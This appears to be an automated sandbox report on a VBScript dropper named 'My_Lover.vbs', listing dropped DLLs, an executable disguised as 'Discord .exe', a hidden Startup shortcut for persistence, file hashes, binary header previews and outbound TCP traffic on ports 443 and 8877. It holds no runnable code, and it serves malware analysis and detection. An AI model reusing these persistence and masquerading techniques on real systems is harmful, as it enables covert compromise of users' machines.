SHA1:	2B139D3335C394E919891F8AA90447E10312A894
SHA-256:	27F99EB692120B42B50C118D85B1C29816D38EC5FF6C3DC68C3D574D281B19B8
SHA-512:	0F918F4DB9553909DC97C479227C47EBA44ED28E7E40342858D7F36C513F64A27CFBC16AF217FF77AA6A69CB538CA7A1FA85CCBAC97DA26302D06AD5B924770D
Malicious:	false
Preview:	PK...........S.7t.............Service/desktop.ini[ViewState]..Mode=..Vid=..FolderType=Generic..PK.........SdU.c..A...........Service/DFO1.dll.].\.....EQ...#E..Thd`T.X.lZA.R.`..ZdV.Zia...JF...%.?.^._>..>.b.../IQ+....f........Y..y.....#;{..{.w....%.O.B+A...?...U....~....w......^.,Y.{..0....O<6..1...3i.c.....(..?qR\|.=...}l\A.....#...Y..:..B.+.[.b.~.Ax..w...h.Da.x/,.K....bU:'..o'...~.i?..EU.K.E...^.-BR.6.......=.......r........W.....O_G.4...H.P..W...3Z...w....8....;b.d..e.I.}......h.w..T......,..Y...% ...w..e.}..'.xi...L/W~J...}..$..S.c5..o".#..g....1...x....3._5.s....IK..4..O..c2.Ql..f.WP..(...9.....n...~.9.b.V.....^..m..5r......\|].............5..C3..<......H.....Y<.JXV5.Um......%y.tc.n..v..r.K...^g.u.b.....5.b...........Jw...{.a.ad@O........)8.XHKq.<..OK#..@......V.a!..`_.`..0Nw6....l$..4.4.;0..I`o..2...VZ...................)7..-..M..p..b05.....<+0.U.S........u.AU.YS94.k.~k...6..k..$...L;8.;E...-.7.....^........pt.`.'.....(....w=.{.W..I.....\|!@.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	4.2794607006164105
Encrypted:	false
SSDEEP:	48:ry1P8pyA2ntl8Oi7xFGJup1ii7OGDuFWdT0uU84DZpXGWadRqfsLQ4guYGGgVsIk:uOpyf4OmG2ibWc3ZkdRQsKGGgVsINg
MD5:	335DE11A4DB15EE6E675C6D80B511985
SHA1:	77350664D812E021F82654A89DA78B45F094C2E1
SHA-256:	4ABDFDD56DD7F09D987A3A6D9DAFCD5D5721C6089891ACC90CDD87EBD82E5CD4
SHA-512:	F82D68CBABC67F2F50D9DDFACDCB687E540A381E40D2912BDAA7124A634251CD2792B122776CD0D5155930D33B7EA7C2E93D995550754E8F1892CAF4862091F2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu Oct 14 18:57:53 2021, mtime=Thu Oct 14 18:59:23 2021, atime=Thu Oct 14 18:57:11 2021, length=257024, window=hide
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	3.608909178695827
Encrypted:	false
SSDEEP:	24:8QauMH6DpLF3oiIJufrHvOAFXLxqGW0osAL23q+XSSmG:8QvMHKph4rufbBdLxqkjO2DCSn
MD5:	9DE9402EA9BDE9C74BC4DB8AD8DA7EC7
SHA1:	F8EF1E8A1E345FBA77888066CF716F0C6529AE69
SHA-256:	5AB6864415ABDF239816D9A0BBE74EED678333D762CFAB06C567D7624910CE4E
SHA-512:	248657CC9525A40C8A9B2BF24BE8B8EF4596A97CC0072ECCF4286C771AC06801C09FF0C21A9141E344FBC358DBC474519F537DC867C6054F3B12D7B5AAE81B8A
Malicious:	false
Preview:	L..................F.... .......5....t..5.... ..5...........................$.:..DG..Yr?.D..U..k0.&...&.........W.i....*.0....S..5.......t...CFSF..1.....NS;...Service...t.Y^...H.g.3..(.....gVA.G..k...@......NS;.NS;......Q.....................P..S.e.r.v.i.c.e...B.f.2.....NS&. .DISCOR~1.EXE..J......NS;.NS;..........1...............s;..D.i.s.c.o.r.d. ...e.x.e.......u...............-...8...Y...........#.?p.....C:\Users\..!...................\\SAAA\Users.lenovo\Service\Discord .exe...1.......\.....\.S.e.r.v.i.c.e.\.D.i.s.c.o.r.d. ...e.x.e.........%USERPROFILE%\Service\Discord .exe..................................................................................................................................................................................................................................%.U.S.E.R.P.R.O.F.I.L.E.%.\.S.e.r.v.i.c.e.\.D.i.s.c.o.r.d. ...e.x.e........................................................................................................................

C:\Users\user\Service\DFO1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115472
Entropy (8bit):	6.530985428503934
Encrypted:	false
SSDEEP:	3072:aOi1h7SHkxG3E4c/Iu6JhNQRBLBavI+WXVKxj:JGLwwlB8Wk
MD5:	FBD4E89A54AE7A598838F38F0ABD9A57
SHA1:	EA17D914C8DDE9C9F976D014AEB62AABE2303051
SHA-256:	3FE21A8C0929E8E453B05399A04093563EA7F28AA8D3F2F96DAA1AAA62E9429A
SHA-512:	ECBDE8175A0BCB0D0B10C50835D3DA585DDA915CBFBEE8042F7E7F5BF028CA295C5AA39368570526D472E233541832DC48AA772CC22EB64A1A7E953F07973B7C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....2.......... ........P.....c.........................0.......p........ .................................0............................ .......................................................................................text....0.......2..................`.P`.data...H....P.......6..............@.0..rdata..8....`.......8..............@.`@.eh_fram.(.......*...N..............@.0@.bss..................................`..edata...............x..............@.0@.idata..0...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc....... ......................@.0B........................................................................................................................................................................................

C:\Users\user\Service\DPUB1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	134928
Entropy (8bit):	6.55613833453705
Encrypted:	false
SSDEEP:	3072:vm54zPuu7Ncnq9bGw2ADa6a+rCaM81QwdGzWnDtIh9xdJ:vm5077Ncnq9b3DYi1TdGzWnpqNJ
MD5:	10C860E01A6C3C3F26967ACC2F0E097B
SHA1:	8DEE32D9A0F7F69CF13CB52381E45EB89D372B76
SHA-256:	B8C9F98E40DC29AFBB7C175C226D8D61EE7B62C3293B6CC47E3916CE0D6AE6E2
SHA-512:	A95769ADFE0421EADB6FDFED25BCFB5CEE7E69624976575E9ED8D2E67DAF982BA42C7BDA681BC0BC7CBF0F7FC1E7190E50C57162B7EC15B9589495AC25B984DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....R.......... ........p.....m.......................................... .............................. ..L....`.......................p...............................P.......................#...............................text....P.......R..................`.P`.data...P....p.......V..............@.0..rdata...............X..............@.p@.eh_fram.5.......6...l..............@.0@.bss....L.............................p..edata..............................@.0@.idata..L.... ......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..rsrc........`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

C:\Users\user\Service\DRES1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	34576
Entropy (8bit):	6.398089215045481
Encrypted:	false
SSDEEP:	768:Iq5aIMn/iXGRH+YHhYWotRzFpIK/PxWEgZ:1oIM/tMYH0VFaK/PxS
MD5:	8C70F59B5407A8828DE416705DC70697
SHA1:	802841F290EB67C6351B28061D26C1AAFC31C030
SHA-256:	CA10F31CC02F9BC026D63A70CDAFBC8423DB1F3367C6AE69ADD9487C89739FB3
SHA-512:	43E794291EA738E7FF026426B9D544D9647A707EA50ED429A75A6255CC5C2060A775B07B35539F742E93DD8A90FB3C4CA2CCBC24A41A238D0BA6EA1E601EC1D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....:...h...... ........P.....e.................................u........ .................................p....................l..............................................................0...\|............................text....9.......:..................`.P`.data...$....P.......>..............@.0..rdata..\....`.......@..............@.0@.eh_fram.....p.......H..............@.0@.bss..................................`..edata...............R..............@.0@.idata..p............T..............@.0..CRT....,............`..............@.0..tls.... ............b..............@.0..rsrc................d..............@.0..reloc...............h..............@.0B........................................................................................................................................................................................

C:\Users\user\Service\DSER1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	83216
Entropy (8bit):	6.539825322538475
Encrypted:	false
SSDEEP:	1536:7dt+L+ndG8qW3IDjLA70HX7kyA6MPAiWen1+OmyEaohwVWe8iQPxo/:7dt+L+ndxnk7kz6PizVEaohwVWe8iAxq
MD5:	DB76B5964C7B471DBC1454FBFD40CFB2
SHA1:	5F94EA2224AA4BA7C4DFDA628B728AE41E33CDDE
SHA-256:	9ACB0719C5B587F85E0F4173BEC4BB109878DA043DCEF03C609AB7D3D190CA1E
SHA-512:	75336A6E6602A8632902234CAD339FC6974CB32C0E8C4AE88D2F90CB5E597F16533F6746DA6BBAFA016E757025D3CDE8B6A507F6CF54E1F7578A6080BF99269B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........&...... ..............o................................8F........ ......................@..W....P.......................*..............................................................xS...............................text...l...........................`.P`.data...T...........................@.0..rdata..x...........................@.p@.eh_fram......... ..................@.0@.bss......... ........................p..edata..W....@......................@.0@.idata.......P......................@.0..CRT....,....p......................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc............... ..............@.0B........................................................................................................................................................................................

C:\Users\user\Service\Discord .exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	312080
Entropy (8bit):	3.0992276746690752
Encrypted:	false
SSDEEP:	384:YUMKaKK1gB6iMCBS8mYBd9qd4irWc/QWppKvrIXANuBc6gq3TjOuev5AiiPxh8Et:crPwUOdOPrWcpp6uBRpeS5PxWEF3MbY
MD5:	2BC22E2E79238D57504BD3720C240533
SHA1:	ED18B56FAA8F83B29122E203B64748025212C611
SHA-256:	AB62D614342F7E4688E9A2CA5414EB472BF7263C634488BED4D790A534AB54B0
SHA-512:	4769D20FE3CD153DA68D85F82A7FF891C6FE2554D086558CDE93453AE67DD2FD000EC72657A57C74F83520AA17CA80EFB30A8E309113E5AB032EA5F766499675
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................0....@........................................... ..............................p..........d_...........................................................................q...............................text...............................`.P`.data...4....0....... ..............@.0..rdata.......@......."..............@.p@.eh_fram.....P......................@.0@.bss.........`........................`..idata.......p.......:..............@.0..CRT....4............D..............@.0..tls.... ............F..............@.0..rsrc...d_.......`...H..............@.0.........................................................................................................................................................................................................................................................................

C:\Users\user\Service\desktop.ini

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.2645152829941075
Encrypted:	false
SSDEEP:	3:SQRUoK2Yd2JBiceAT:SQRUmYdOio
MD5:	15478B340A8362BB79FD2A6EA0DDE1A0
SHA1:	D48418A9C291D7272431CC5A93102AABA7A94E04
SHA-256:	27991CD3E2892702F610FD5262898F1C3DFA37E2A05082FD793BCE61E99E2D98
SHA-512:	D852C3A16559FB3E203BF2CF870AD40562891B430F3CD6756E856C46A476E470E4641E1A5A08ED18A6D779B961E7AE8F0154B2BD62AADE495B1995A4B6D271F6
Malicious:	false
Preview:	[ViewState]..Mode=..Vid=..FolderType=Generic..

C:\Users\user\Service\libcrypto-3.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3728896
Entropy (8bit):	6.131274685027676
Encrypted:	false
SSDEEP:	49152:rHD9UAwh1o1pSnXVYrF2pUCX23vUAzAW+vQ1CPwDvt3uFTDCH46eEh5m:rHDhJ7+nW+o1CPwDvt3uFTDCY
MD5:	BAC6CC974C7702B995F718D7FC230F93
SHA1:	02E8622EE1CA3EF7BA100E32082CA8EC6E570BE9
SHA-256:	DB1A3DC6354FE8670FA12B1FF99E1A9A461C21E991AAA377984798A8990D3131
SHA-512:	8C8CC929BD9B86A3190ABF412AAE18B81EC8CAD708F51811A52AC980F0E8435640FEC947237C4E4674D1A62972B84F69E67ADDD461AF747FD9E4FC13A8C61315
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.H6&.&e&.&e&.&e/..e2.&et.'d$.&et.#d-.&et."d,.&et.%d,.&e2.'d/.&e&.'e..&e&.&e1.&e~."dD.&e~.&d'.&e~..e'.&e~.$d'.&eRich&.&e........PE..L.....a...........!.....F.................`..............................@9...........@...........................3......E7.@....p7.s.....................7.......3.8...........................8.3.@............@7..............................text...nD......F................. ..`.rdata.......`......J.............@..@.data....>....7.......6.............@....idata.......@7.......7.............@..@.00cfg.......`7...... 7.............@..@.rsrc...s....p7......"7.............@..@.reloc.......7......*7.............@..B........................................................................................................................................................................................................................

C:\Users\user\Service\libgcc_s_dw2-1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	119822
Entropy (8bit):	6.3909187174348965
Encrypted:	false
SSDEEP:	1536:CxINSJvU82V9dUT4PsXQ+2Q4p2VtjByBzEj6zu3PEhOKeLTxaek:CzmpUkPsXQ+2zsBy9IPEh6Zaek
MD5:	FADDE43C97607E4445A6F924D851F04E
SHA1:	36C1AA0E1B6D4A322C350F5E502C10C64C203041
SHA-256:	F0614835136413217ED3BAEC9BA22AAAC4C37956AFCB0209F1F89B7676AE86BC
SHA-512:	66F5637419F88070838ED522DEFAD9AA1B46DD4FD8CB045E0292742831520740D152795B6E99770F34061DB596019EF3A342A956B541180E78D1C48B2703F42C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V.......... ........p.....n.........................@......<;........ ........................._....................................0............................... .......................................................text...HT.......V..................`.P`.data........p.......Z..............@.0..rdata...).......*...\..............@.p@/4......4........0..................@.0@.bss....8.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................

C:\Users\user\Service\libssl.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	619520
Entropy (8bit):	5.764280734436876
Encrypted:	false
SSDEEP:	12288:omslxfM6wJqtjOuHWHmWGMeZdz9O3/OhpcttpRxb2Fe9XbAAK5Z:omslq6LTNShb2Fe9XbY5Z
MD5:	30932C2C92245AFFFC9000F2EAE5F9B6
SHA1:	905A47E3224853592315950F2EEC6D6A84ED52A3
SHA-256:	1A0234826C00AA35BFAC26597A8B8ADD933F21F60CB1F5B6A7BDCA9F3D771FC2
SHA-512:	1DDC68CB8A0CDDE4A490FC02A0202521184C6854969A96266A8F3872BD7C2571BB153130943917120B7F3A46BF4A965FC2E2862FA07AAA2B340A431D18895393
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..j_.j_.j_.c'B.f_.8.h_.~4.h_.8.a_.8.`_.8.h_.2.i_.j_.}].2.Z_.2.k_.2..k_.2*.k_.Richj_.........PE..L.....a...........!.................$....................................................@.........................@W...Q...........P..i....................`...E..dE..8............................E..@............................................text............................... ..`.rdata.............................@..@.data....<.......:..................@....idata..ZJ.......L..................@..@.00cfg.......@......................@..@.rsrc...i....P......................@..@.reloc...O...`...P...$..............@..B........................................................................................................................................................................................................................

C:\Users\user\Service\libstdc++-6.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1026062
Entropy (8bit):	6.4304256270205205
Encrypted:	false
SSDEEP:	24576:KSNHTild8LMw2g8XiGkMAZ0dP5Bd+1DT50v4H:7dLM8GkMAQBdih
MD5:	C283D446B34E75019B81D0981CB11F0D
SHA1:	A6E146975DFC55B0659D09E25B9A69F7CFF993DC
SHA-256:	F6530962659D0641236A42517A30DC55C4FCB7D30E942C3E820AF343798A770D
SHA-512:	EB51969A79EE4501C955A81CEC9F07E9A39007C1EA69C5021E03EBF3B640D949E19F6E0CD7AF969E80EC60EA6B8477804FB76DEEC2704DB503E72906103FEA63
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#................ ..............o.......................................... .........................5g...... ................................O......................................................H............................text...............................`.P`.data....i.......j..................@.p..rdata.......`.......B..............@.p@/4...........@......................@.0@.bss..................................`..edata..5g.......h..................@.0@.idata.. ............B..............@.0..CRT....,............T..............@.0..tls.... ............V..............@.0..reloc...O.......P...X..............@.0B................................................................................................................................................................................................................................

C:\Users\user\Service\libwinpthread-1.dll

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	6.198246444448612
Encrypted:	false
SSDEEP:	768:NdOT5wjxqOfH36THnf/GcTuI4bOBxZXmVwDI7dTBhkSoFrg22222222222A26wiB:rE5wtqOfX6T/uDIm4xZ2WI7jhkSoFHij
MD5:	D128AE39A79E5D196FC001907B5EC3D1
SHA1:	71DE74D0AA93903E0A169C88FD21E0C617F0660A
SHA-256:	4195AC1E3A4A8056DE42C31D511E0E595772439ADBA96180B8953EF5F135F7A5
SHA-512:	5B32EB7E2F01FB17ED0C4434A525AE3056ACDDDE75C32C5036C18B6F2FFA4CF80CFEE9BAB4C824CA313E6E33114EA0E761DC8F75DB3BBBBE4319C079848A3C06
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Metadefender, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..............#................ ..............d.........................@.......j........ .................................P.... ..P....................0..........................................................D............................text...............................`.P`.data...T...........................@.0..rdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..P...........................@.0..CRT....0...........................@.0..tls.... ...........................@.0..rsrc...P.... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	7.846097535655919
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	My_Lover.vbs
File size:	2491267
MD5:	1a329d8554b4d879c9042e91c291c1e6
SHA1:	af1b398fe2c46bf42c49ab0ae9608820db81790e
SHA256:	78a102288e31f10b5e9bf56555da8bc1b9372761563ab45672be4c11e1626243
SHA512:	c191690fbfc1d8dac596d20dbc93160628eecfba089425e65452aacd15cb9e9c669beb73a9929313e2db2308a06cd11f9fb7cb0cb1ec2afc6119bdaf00875cc2
SSDEEP:	49152:TOPCAgl2eL0I7/86fw8HQ9/GpZaWlBL8GgqZDD:yPCAglJLT/84NHo/uaUBIGgqZDD
TLSH:	91B533056C2535EE26DB69B602621237AE836AF0DC7A137911AEF80712F4F0D792FD53
File Content Preview:	c="....aa4.JFIFaa4...aa4`aa4`aa4aa4..aa4Caa4.............aa1aa55.aa2aa55..aa55............. $.' aa3,#..(7),01444.'9=82<.342..aa4C....aa55.aa55.aa2aa2.2!.!22222222222222222222222222222222222222222222222222..aa4...aa3....aa3aa4........aa4.aa4aa4........aa4a

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2022 19:59:45.081480980 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.081533909 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.081633091 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.092432022 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.092470884 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.162748098 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.164313078 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.164336920 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.166548014 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.166635036 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.173818111 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.173830986 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.173991919 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.173994064 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.174015999 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.204519987 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.204565048 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.204679966 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.204715967 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.204775095 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.223728895 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.223771095 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.223854065 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.223898888 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.223915100 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.226715088 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.226799965 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.226824999 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.226854086 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.226926088 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.325053930 CET	49731	8877	192.168.2.7	91.109.178.2
Nov 4, 2022 19:59:45.340061903 CET	49728	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.340106964 CET	443	49728	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.435367107 CET	8877	49731	91.109.178.2	192.168.2.7
Nov 4, 2022 19:59:45.435688972 CET	49731	8877	192.168.2.7	91.109.178.2
Nov 4, 2022 19:59:45.497680902 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.497729063 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.497817993 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.498440027 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.498454094 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.536438942 CET	8877	49731	91.109.178.2	192.168.2.7
Nov 4, 2022 19:59:45.536861897 CET	49731	8877	192.168.2.7	91.109.178.2
Nov 4, 2022 19:59:45.546488047 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.555191994 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.555262089 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.556729078 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.556874990 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.561368942 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.561400890 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.561604023 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.561611891 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.561671972 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.591826916 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.591876030 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.592034101 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.592061996 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.592128038 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.608623981 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.608675003 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.608823061 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.608851910 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.608871937 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.611224890 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.611324072 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.611345053 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.611373901 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:45.612890959 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.687247038 CET	8877	49731	91.109.178.2	192.168.2.7
Nov 4, 2022 19:59:45.687347889 CET	49731	8877	192.168.2.7	91.109.178.2
Nov 4, 2022 19:59:45.844305038 CET	8877	49731	91.109.178.2	192.168.2.7
Nov 4, 2022 19:59:45.902908087 CET	49732	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:45.902972937 CET	443	49732	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.091288090 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.091373920 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.091656923 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.092252970 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.092282057 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.137945890 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.142055035 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.142116070 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.146063089 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.146481991 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.151413918 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.151460886 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.151669025 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.151678085 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.151701927 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.181616068 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.181678057 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.181852102 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.181894064 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.181966066 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.198465109 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.198508978 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.198664904 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.198709965 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.201103926 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.201242924 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.201250076 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.202791929 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.481313944 CET	49733	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.481363058 CET	443	49733	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.653384924 CET	49734	443	192.168.2.7	198.51.233.2
